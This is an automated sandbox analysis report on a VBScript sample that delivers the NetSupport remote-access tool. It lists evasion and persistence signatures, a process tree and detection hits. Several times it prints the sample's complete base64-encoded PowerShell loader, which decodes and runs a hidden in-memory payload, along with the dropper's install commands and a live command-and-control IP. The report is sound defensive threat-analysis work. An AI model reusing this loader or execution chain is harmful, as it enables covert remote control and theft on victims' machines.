Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Pyyidau.vbs

Overview

General Information

Sample name:Pyyidau.vbs
Analysis ID:1561295
MD5:c1108260f7a287cb16f93c11a40fbf90
SHA1:8eab07aef27baae17d1ce013cce58b2b43dcaa1d
SHA256:484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c
Tags:vbsuser-aachum
Infos:

Detection

NetSupport RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious encrypted Powershell command line found
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
.NET source code contains potential unpacker
AI detected suspicious sample
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to automate explorer (e.g. start an application)
Creates processes via WMI
Drops HTML or HTM files to system directories
Drops executables to the windows directory (C:\Windows) and starts them
Enables network access during safeboot for specific services
Found stalling execution ending in API Sleep call
Hides threads from debuggers
Potential malicious VBS script found (has network functionality)
Potential malicious VBS script found (suspicious strings)
Powershell is started from unusual location (likely to bypass HIPS)
Queries memory information (via WMI often done to detect virtual machines)
Queries pointing device information (via WMI, Win32_PointingDevice, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Queries sensitive sound device information (via WMI, Win32_SoundDevice, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Reads the Security eventlog
Reads the System eventlog
Sample is not signed and drops a device driver
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Uses dynamic DNS services
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected Costura Assembly Loader
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read device registry values (via SetupAPI)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the driver directory
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Potential key logger detected (key state polling based)
Queries device information via Setup API
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Execution From GUID Like Folder Names
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected NetSupport remote tool

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7060 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pyyidau.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • Pyyidau.vbs.exe (PID: 2916 cmdline: "C:\Users\user\Desktop\Pyyidau.vbs.exe" -enc JABBAHEAdwB3AHMAYwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQAuAFIAZQBwAGwAYQBjAGUAKAAnAC4AZQB4AGUAJwAsACcAJwApADsAJABHAHkAaQBlAHAAZwBrAHcAdgByACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQAQQBxAHcAdwBzAGMAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ATABhAHMAdAAgADEAOwAgACQAWABzAGwAbQB3AG0AbwBxAGcAawB6ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEcAeQBpAGUAcABnAGsAdwB2AHIALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAEkAdwBxAGIAdwBjACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAIAAsACAAJABYAHMAbABtAHcAbQBvAHEAZwBrAHoAIAApADsAJABFAG0AYgBtAGUAcwBqAHMAbAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQAUgB3AHAAdQB4AHcAYQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABJAHcAcQBiAHcAYwAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAUgB3AHAAdQB4AHcAYQAuAEMAbwBwAHkAVABvACgAIAAkAEUAbQBiAG0AZQBzAGoAcwBsACAAKQA7ACQAUgB3AHAAdQB4AHcAYQAuAEMAbABvAHMAZQAoACkAOwAkAEkAdwBxAGIAdwBjAC4AQwBsAG8AcwBlACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAgACQAWABzAGwAbQB3AG0AbwBxAGcAawB6ACAAPQAgACQARQBtAGIAbQBlAHMAagBzAGwALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAFgAcwBsAG0AdwBtAG8AcQBnAGsAegApADsAIAAkAE4AZgBrAGYAZwB0AHQAcgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABoAHIAZQBhAGQAaQBuAGcALgBUAGgAcgBlAGEAZABdADoAOgBHAGUAdABEAG8AbQBhAGkAbgAoACkALgBMAG8AYQBkACgAJABYAHMAbABtAHcAbQBvAHEAZwBrAHoAKQA7ACAAJABBAHYAZgBuAHgAdQBrAG4AcgBtAG0AIAA9ACAAJABOAGYAawBmAGcAdAB0AHIALgBFAG4AdAByAHkAUABvAGkAbgB0ADsAIABbAFMAeQBzAHQAZQBtAC4ARABlAGwAZQBnAGEAdABlAF0AOgA6AEMAcgBlAGEAdABlAEQAZQBsAGUAZwBhAHQAZQAoAFsAQQBjAHQAaQBvAG4AXQAsACAAJABBAHYAZgBuAHgAdQBrAG4AcgBtAG0ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAEEAdgBmAG4AeAB1AGsAbgByAG0AbQAuAE4AYQBtAGUAKQAuAEQAeQBuAGEAbQBpAGMASQBuAHYAbwBrAGUAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA= MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 2496 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\50d669f573135aafd57c..vbs" MD5: FF00E0480075B095948000BDC66E81F0)
        • msiexec.exe (PID: 6332 cmdline: "C:\Windows\SysWOW64\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\vrep.msi" /quiet MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • RegAsm.exe (PID: 6832 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • RegAsm.exe (PID: 5480 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • RegAsm.exe (PID: 2228 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • RegAsm.exe (PID: 6316 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • RegAsm.exe (PID: 7036 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • RegAsm.exe (PID: 6272 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • RegAsm.exe (PID: 6352 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • RegAsm.exe (PID: 2060 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • RegAsm.exe (PID: 6112 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • RegAsm.exe (PID: 4484 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cmd.exe (PID: 6176 cmdline: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\Pyyidau.vbs.exe" /Y MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • msiexec.exe (PID: 2720 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 1344 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 19326FA0C651FB2486638441C45D4A3A MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • cmd.exe (PID: 5016 cmdline: cmd.exe /c ATTRIB -R "C:\Users\user\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\\nsm.lic" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • attrib.exe (PID: 3384 cmdline: ATTRIB -R "C:\Users\user\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\\nsm.lic" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
    • MSI264F.tmp (PID: 3992 cmdline: "C:\Windows\Installer\MSI264F.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EU MD5: 0FCF65C63E08E77732224B2D5D959F13)
    • msiexec.exe (PID: 3888 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 6881B33184DF9141E848EAD78A411E72 E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • MSI2BE4.tmp (PID: 3084 cmdline: "C:\Windows\Installer\MSI2BE4.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EU MD5: 0FCF65C63E08E77732224B2D5D959F13)
    • checkdvd.exe (PID: 5936 cmdline: "C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe" MD5: FE7D9DC26FF1615C13722E0F2DD3B815)
    • MSI3FCC.tmp (PID: 928 cmdline: "C:\Windows\Installer\MSI3FCC.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EV"NetSupport School" /EF".\Log Files" /EF".\Bookmarks" /EF".\Tests" /EF".\Store" /EF".\inv" /EF".\Resources" /EF".\Help" /EF".\Image" /EF".\Sound" /EF".\Video" /EA /EX /EC /Q /V /Q /I * MD5: 0FCF65C63E08E77732224B2D5D959F13)
      • winst64.exe (PID: 2816 cmdline: winst64.exe /q /q /ex /i MD5: 96E987D909600D34DD70C55F56EB8869)
    • MSI51C1.tmp (PID: 6020 cmdline: "C:\Windows\Installer\MSI51C1.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EI MD5: 0FCF65C63E08E77732224B2D5D959F13)
    • pcicfgui_client.exe (PID: 6340 cmdline: "C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe" /Q "C:\Program Files (x86)\NetSupport\NetSupport Manager\Client32.ini" MD5: B8ACD5C9E200166C6B4E5001AEEEAF20)
      • pcicfgui_client.exe (PID: 6396 cmdline: "C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe" MD5: B8ACD5C9E200166C6B4E5001AEEEAF20)
  • client32.exe (PID: 2676 cmdline: "C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe" /* * MD5: 297EA82401ACBEAD6BA4B19880DF2B8C)
    • client32.exe (PID: 6420 cmdline: "C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe" * /VistaUI MD5: 297EA82401ACBEAD6BA4B19880DF2B8C)
    • client32.exe (PID: 4296 cmdline: "C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe" * /VistaUI MD5: 297EA82401ACBEAD6BA4B19880DF2B8C)
      • cscript.exe (PID: 3352 cmdline: "cscript.exe" C:\Windows\system32\Printing_Admin_Scripts\en-US\prnport.vbs -a -r NSM001 -h 127.0.0.1 -o raw -n 49850 MD5: CB601B41D4C8074BE8A84AED564A94DC)
        • conhost.exe (PID: 1360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • client32.exe (PID: 3904 cmdline: "C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe" * /VistaUI MD5: 297EA82401ACBEAD6BA4B19880DF2B8C)
  • svchost.exe (PID: 1892 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 5720 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4296 -ip 4296 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 3084 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s TapiSrv MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Windows\System32\drivers\nskbfltr.sysJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
    C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIVDD.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
      C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
        C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicapi.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
          C:\Program Files (x86)\NetSupport\NetSupport Manager\NSClientTB.exeJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
            Click to see the 66 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000005.00000003.2439151550.0000000008DD0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
              00000015.00000003.2485822412.0000000003086000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                00000026.00000003.2696801013.000000000769D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                  0000001E.00000002.2554269183.00000000004F7000.00000004.00000001.01000000.0000000C.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                    00000022.00000002.2658298152.0000000000DE7000.00000004.00000001.01000000.00000013.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                      Click to see the 68 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      36.2.pcicfgui_client.exe.6f950000.6.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                        38.0.client32.exe.730000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                          40.2.client32.exe.730000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                            37.0.pcicfgui_client.exe.d40000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                              36.2.pcicfgui_client.exe.d40000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                                Click to see the 42 entries

                                Sigma Signatures

                                System Summary

                                barindex
                                Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Pyyidau.vbs.exe" -enc JABBAHEAdwB3AHMAYwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQAuAFIAZQBwAGwAYQBjAGUAKAAnAC4AZQB4AGUAJwAsACcAJwApADsAJABHAHkAaQBlAHAAZwBrAHcAdgByACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQAQQBxAHcAdwBzAGMAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ATABhAHMAdAAgADEAOwAgACQAWABzAGwAbQB3AG0AbwBxAGcAawB6ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEcAeQBpAGUAcABnAGsAdwB2AHIALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAEkAdwBxAGIAdwBjACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAIAAsACAAJABYAHMAbABtAHcAbQBvAHEAZwBrAHoAIAApADsAJABFAG0AYgBtAGUAcwBqAHMAbAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQAUgB3AHAAdQB4AHcAYQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABJAHcAcQBiAHcAYwAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAUgB3AHAAdQB4AHcAYQAuAEMAbwBwAHkAVABvACgAIAAkAEUAbQBiAG0AZQBzAGoAcwBsACAAKQA7ACQAUgB3AHAAdQB4AHcAYQAuAEMAbABvAHMAZQAoACkAOwAkAEkAdwBxAGIAdwBjAC4AQwBsAG8AcwBlACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAgACQAWABzAGwAbQB3AG0AbwBxAGcAawB6ACAAPQAgACQARQBtAGIAbQBlAHMAagBzAGwALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAFgAcwBsAG0AdwBtAG8AcQBnAGsAegApADsAIAAkAE4AZgBrAGYAZwB0AHQAcgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABoAHIAZQBhAGQAaQBuAGcALgBUAGgAcgBlAGEAZABdADoAOgBHAGUAdABEAG8AbQBhAGkAbgAoACkALgBMAG8AYQBkACgAJABYAHMAbABtAHcAbQBvAHEAZwBrAHoAKQA7ACAAJABBAHYAZgBuAHgAdQBrAG4AcgBtAG0AIAA9ACAAJABOAGYAawBmAGcAdAB0AHIALgBFAG4AdAByAHkAUABvAGkAbgB0ADsAIABbAFMAeQBzAHQAZQBtAC4ARABlAGwAZQBnAGEAdABlAF0AOgA6AEMAcgBlAGEAdABlAEQAZQBsAGUAZwBhAHQAZQAoAFsAQQBjAHQAaQBvAG4AXQAsACAAJABBAHYAZgBuAHgAdQBrAG4AcgBtAG0ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAEEAdgBmAG4AeAB1AGsAbgByAG0AbQAuAE4AYQBtAGUAKQAuAEQAeQBuAGEAbQBpAGMASQBuAHYAbwBrAGUAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=, CommandLine: "C:\Users\user\Desktop\Pyyidau.vbs.exe" -enc JABBAHEAdwB3AHMAYwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQAuAFIAZQBwAGwAYQBjAGUAKAAnAC4AZQB4AGUAJwAsACcAJwApADsAJABHAHkAaQBlAHAAZwBrAHcAdgByACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQAQQBxAHcAdwBzAGMAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ATABhAHMAdAAgADEAOwAgACQAWABzAGwAbQB3AG0AbwBxAGcAawB6ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEcAeQBpAGUAcABnAGsAdwB2AHIALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALA
                                Sigma detected: Script Initiated Connection to Non-Local Network
                                Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 176.126.113.166, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 2496, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
                                Sigma detected: Script Interpreter Execution From Suspicious Folder
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\50d669f573135aafd57c..vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\50d669f573135aafd57c..vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\Pyyidau.vbs.exe" -enc JABBAHEAdwB3AHMAYwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQAuAFIAZQBwAGwAYQBjAGUAKAAnAC4AZQB4AGUAJwAsACcAJwApADsAJABHAHkAaQBlAHAAZwBrAHcAdgByACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQAQQBxAHcAdwBzAGMAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ATABhAHMAdAAgADEAOwAgACQAWABzAGwAbQB3AG0AbwBxAGcAawB6ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEcAeQBpAGUAcABnAGsAdwB2AHIALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAEkAdwBxAGIAdwBjACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAIAAsACAAJABYAHMAbABtAHcAbQBvAHEAZwBrAHoAIAApADsAJABFAG0AYgBtAGUAcwBqAHMAbAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQAUgB3AHAAdQB4AHcAYQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABJAHcAcQBiAHcAYwAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAUgB3AHAAdQB4AHcAYQAuAEMAbwBwAHkAVABvACgAIAAkAEUAbQBiAG0AZQBzAGoAcwBsACAAKQA7ACQAUgB3AHAAdQB4AHcAYQAuAEMAbABvAHMAZQAoACkAOwAkAEkAdwBxAGIAdwBjAC4AQwBsAG8AcwBlACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAgACQAWABzAGwAbQB3AG0AbwBxAGcAawB6ACAAPQAgACQARQBtAGIAbQBlAHMAagBzAGwALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAFgAcwBsAG0AdwBtAG8AcQBnAGsAegApADsAIAAkAE4AZgBrAGYAZwB0AHQAcgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABoAHIAZQBhAGQAaQBuAGcALgBUAGgAcgBlAGEAZABdADoAOgBHAGUAdABEAG8AbQBhAGkAbgAoACkALgBMAG8AYQBkACgAJABYAHMAbABtAHcAbQBvAHEAZwBrAHoAKQA7ACAAJABBAHYAZgBuAHgAdQBrAG4AcgBtAG0AIAA9ACAAJABOAGYAawBmAGcAdAB0AHIALgBFAG4AdAByAHkAUABvAGkAbgB0ADsAIABbA